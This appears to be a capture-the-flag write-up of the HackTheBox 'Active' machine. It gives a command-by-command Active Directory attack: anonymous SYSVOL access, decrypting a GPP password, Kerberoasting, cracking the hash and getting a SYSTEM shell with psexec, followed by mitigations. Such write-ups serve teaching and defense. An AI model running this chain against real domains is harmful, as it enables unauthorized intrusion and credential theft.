← ctf writeups

// Active — HackTheBox

────────────────────────────────────────────────────

Active — HackTheBox

IP: 10.10.10.100 OS: Windows Server (Domain: active.htb) Difficulty: Easy


Why This Box Matters

Active chains two of the most common real-world AD misconfigurations: a Group Policy Preferences (GPP) password stored in SYSVOL, and a Kerberoastable Domain Admin. Both still show up on live internal engagements years after Microsoft “fixed” them.


Reconnaissance

nmap -sC -sV -p- 10.10.10.100

53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
139/tcp  open  netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb)
445/tcp  open  microsoft-ds

Kerberos + LDAP + SMB = a domain controller for active.htb.

SMB: Anonymous SYSVOL Access

smbclient -N -L //10.10.10.100/

Sharename       Type      Comment
Replication     Disk
Users           Disk

Replication is readable with a null session — it’s an unauthenticated copy of SYSVOL.

smbclient -N //10.10.10.100/Replication
# recursively pull everything
mask ""; recurse ON; prompt OFF; mget *

Buried in the policies is a GPP file:

active.htb/Policies/{31B2F340-...}/MACHINE/Preferences/Groups/Groups.xml

Decrypting the GPP Password

<Groups ...>
  <User ... name="active.htb\SVC_TGS"
    cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>
</Groups>

GPP cpassword values are AES-encrypted with a static key Microsoft published in MSDN — so they’re trivially reversible:

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

Valid domain creds: active.htb\SVC_TGS : GPPstillStandingStrong2k18.

Kerberoasting to Domain Admin

With any valid account you can request service tickets (TGS) for accounts that have an SPN — and the Administrator here does:

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 \
  -dc-ip 10.10.10.100 -request

ServicePrincipalName  Name           MemberOf
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS...

The TGS is encrypted with the service account’s NTLM hash — crack it offline:

hashcat -m 13100 admin_tgs.hash /usr/share/wordlists/rockyou.txt
Ticketmaster1968

Domain Admin

psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100

C:\> whoami
nt authority\system

Root Cause & Mitigation

  • GPP passwords: patch MS14-025 and delete legacy Groups.xml/Services.xml from SYSVOL — the fix stops new ones but does not remove existing files.
  • Kerberoasting: use gMSA/long random passwords (25+ chars) for service accounts, and never leave a privileged account with an SPN. Alert on TGS requests using RC4 (4769, encryption type 0x17).
────────────────────────────────────────────────────